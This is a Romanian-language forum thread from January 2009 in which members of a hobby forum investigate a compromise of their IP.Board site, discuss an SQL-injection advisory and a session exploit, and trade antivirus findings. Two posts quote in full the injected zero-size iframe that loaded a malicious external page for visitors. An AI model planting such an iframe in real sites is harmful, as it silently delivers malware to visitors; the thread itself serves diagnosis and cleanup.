Virusi ....pe forum
#1
Postat 27 January 2009 - 06:54 PM
Asta a gasit la mine antivirusul:
http://telepopki.php...index.php\index
JS:Packed-I [Trj]
Cal Troian
090127-0, 01/27/2009
Pe pagina de forum sau in orice subiect intram.
FPV is not a crime!
Hitec Optic 6 Spectra 35MHz sinteza
FrSky 2.4GHz modul
Easy Glider BL
FW 190 A8
P 51D Mustang
IAR 80
ME 163
Tel: 0741-931.767
#2
Postat 27 January 2009 - 07:10 PM
casper20, la Jan 27 2009, 06:54 PM, a spus:
Asta a gasit la mine antivirusul:
http://telepopki.php...index.php\index
JS:Packed-I [Trj]
Cal Troian
090127-0, 01/27/2009
Pe pagina de forum sau in orice subiect intram.
#3
Postat 27 January 2009 - 07:17 PM
#5
Postat 27 January 2009 - 07:23 PM
#6
Postat 27 January 2009 - 08:24 PM
casper20, la Jan 27 2009, 06:54 PM, a spus:
Asta a gasit la mine antivirusul:
http://telepopki.php...index.php\index
JS:Packed-I [Trj]
Cal Troian
090127-0, 01/27/2009
Pe pagina de forum sau in orice subiect intram.
Linkul dat de tine imi scrie ca e unsecure in opera, imi taie redirectionarea automat, nu ma lasa sa il accesez.
Va recomand versiunile cele mai noi la orice browser aveti, dar recomand utilizarea a ceva renumit, cum ar fi Opera, Firefox, mai nou Google Chrome si altele.
#7
Postat 27 January 2009 - 08:29 PM
"<iframe src="http://www.apelsin-agency.com/traff/go.php?sid=1" frameborder=0 width=0 height=0></iframe>"
Aceasta postare a fost editata de sebi_p: 27 January 2009 - 08:34 PM
#9
Postat 27 January 2009 - 09:44 PM
Aparent un bot a reusit sa intre in pannelul de administrare si sa modifice o tema inserand acest iframe care-si cam face de cap injectand bannere ascunse si pop-up-uri.
Acum stau si ma intreb cand vom primi spamuri la adresele de email in mod normal non accesibile oricui.
Aviz Adminilor! Daca aveti nevoie de ajutor imi ofer cu placere asistenta.
#10
Postat 27 January 2009 - 09:46 PM
Kriminel, la Jan 27 2009, 09:44 PM, a spus:
Aparent un bot a reusit sa intre in pannelul de administrare si sa modifice o tema inserand acest iframe care-si cam face de cap injectand bannere ascunse si pop-up-uri.
Acum stau si ma intreb cand vom primi spamuri la adresele de email in mod normal non accesibile oricui.
Aviz Adminilor! Daca aveti nevoie de ajutor imi ofer cu placere asistenta.
Daca mai este nevoie de o mana buna va pota ajuta, doar termin anul asta faculta de info.
FPV is not a crime!
Hitec Optic 6 Spectra 35MHz sinteza
FrSky 2.4GHz modul
Easy Glider BL
FW 190 A8
P 51D Mustang
IAR 80
ME 163
Tel: 0741-931.767
#11
Postat 27 January 2009 - 10:21 PM
Citeaza
We have released a single-file security patch which impacts IP.Board 2.2.x and 2.3.x versions. This is a critical update. Please apply the patch as soon as possible or contact our technical support via the client area if you need assistance.
Issue
It is possible to perform a remote SQL exploit and inject SQL code in an existing IPB query.
Patching Your Board
If you have downloaded your IP.Board after the time of this announcement, the patch is already included in your files. To patch an existing installation, simply download the attached file and overwrite: sources/action_public/xmlout.php
xmlout.zip
Mai sunt si alte exploituri, fac si eu niste teste acuma...
sursa:
#14
#15
Postat 27 January 2009 - 10:44 PM
Pana acum doar acel iframe a fost injectat, in footer dupa copyright.
Mi-e ca nu e doar SQL inject, exploitul ce l-am gasit lucreaza din greu pe contul de admin. Si nu cu brute force ce cu un exploit al session managerului din IPB. Deci e clar ca s-a logat cu un cont cu permisiuni mari si a modificat template-ul direct din pannel.
Aceasta postare a fost editata de Kriminel: 27 January 2009 - 10:47 PM
#16
Postat 27 January 2009 - 10:54 PM
Troianul aparut este usor de scos si de evitat. afecteaza doar internet explorer si vine pe porturi administrate de firewall.
Inca nu am gasit exact pe ce porturi.
De inlaturat, e simplu... un scan cu nod32 updatat la zi.
Nu pot pune link-uri si nici nu pot spune mai multe aici. Daca aveti nevoie de ajutor.. gasiti ym-ul meu in profil.

.....::i'm a joker. assume that when you read me::......
#18
Postat 27 January 2009 - 11:07 PM
Kriminel, la Jan 27 2009, 11:00 PM, a spus:
am apucat sa arunc o privire pe posturi... ceva e gresit
mie mi-a sarit in aer nod-ul in momentul in care am testat ce se intampla cu forumul daca il deschid cu ie.
"Trojan-Downloader.Win32.Agent.aukz" este ce mi-a venit de pe serverul rhc.
Aici sunt ceva info despre el.
ce nu gasesc inca e unde si cum se infiltreaza pe server.
din pacate internet providerul meu nu imi permite o scanare amanuntita a serverului rhc... asa ca ma joc un pic de-a "baba-oarba" in depistarea problemei...
Aceasta postare a fost editata de porcofon: 27 January 2009 - 11:09 PM

.....::i'm a joker. assume that when you read me::......
#19
Postat 27 January 2009 - 11:16 PM
porcofon, la Jan 27 2009, 11:07 PM, a spus:
mie mi-a sarit in aer nod-ul in momentul in care am testat ce se intampla cu forumul daca il deschid cu ie.
"Trojan-Downloader.Win32.Agent.aukz" este ce mi-a venit de pe serverul rhc.
Aici sunt ceva info despre el.
ce nu gasesc inca e unde si cum se infiltreaza pe server.
din pacate internet providerul meu nu imi permite o scanare amanuntita a serverului rhc... asa ca ma joc un pic de-a "baba-oarba" in depistarea problemei...
Daca citesti cu atentie toate posturile o sa vezi unde e problema si cum s-a infiltrat pe server si ce ti-a venit de pe serverul rhc. Si in privinta scanarii amanuntite: Atentie !!! . Daca nu e ceruta poate fi considerata o tentativa de atac la server ... Si despre scanarea cu nod32 a board-ului ....
Aceasta postare a fost editata de sebi_p: 27 January 2009 - 11:17 PM
#20
Postat 27 January 2009 - 11:23 PM
sebi_p, la Jan 27 2009, 11:16 PM, a spus:
cunosc regulile instituirii starii de atac la server...
oricum.. scanarea cu nod e posibil sa nu dea rezultate dupa instalarea micutului. (scanarea cu nod era pentru userii rhc, nu pentru server sau sursa)

.....::i'm a joker. assume that when you read me::......
#21
Postat 28 January 2009 - 01:31 AM
Casper a dat mai sus linkul catre pagina din iframe, cei slabi de inger sa nu intre dar daca va uitati in sursa ei vedeti cate marsavii incearca sa faca.
Rusii ne-au facut din nou :unsure:
#22
Postat 28 January 2009 - 05:32 AM
#24
Postat 28 January 2009 - 08:48 AM
renatoa, la Jan 28 2009, 07:49 AM, a spus:
Vad ca tot nu s-a inlaturat din template <iframe src="http://www.apelsin-agency.com/traff/go.php?sid=1" frameborder=0 width=0 height=0></iframe> .... Asta redirecteaza la cutia pandorei.
#27 Guest_Webmaster_*
Postat 28 January 2009 - 11:55 AM
In legatura cu patch-ul, el deja exista pe server, fiind instalat in momentul in care s-a facut upgrade la noua versiune de soft.
In privinta cauzei inca studiem problema.
#28
Postat 28 January 2009 - 06:48 PM
renatoa, la Jan 28 2009, 07:49 AM, a spus:
nu are nici o legatura browserul firewallu xp-u si alte dume cu acest exploit. Forumul a fost cel exploatat nu calculatoarele voastre. Ori calculatoarele voastre executa ce-i zice forumu' din moment ce-l accesezi. Daca codul forumului este compromis injectandu-se cod (iframe-ul in cauza), ORICE browser va afisa continutul acelui frame si prin 40 jde mii de firewalluri "hard" si alte vrajeli ieftine.
@Webmaster, este un exploit ce ia contul de admin printr-un fel de brute force la session manager. Daca este rulat dupa ce un admin a fost logat si nu a cerut expres logout (clear session) va putea sa foloseasca acel key pentru logare si chiar spoofare a ip-ului. Am rulat acel exploit cam 30 de minute aseara timp in care nu a gasit nimic. Daca mai e nevoie va stau la dispozitie cu explicatiile codului, din motive evidente nu-l voi pune aici.
Numai bine,
Calin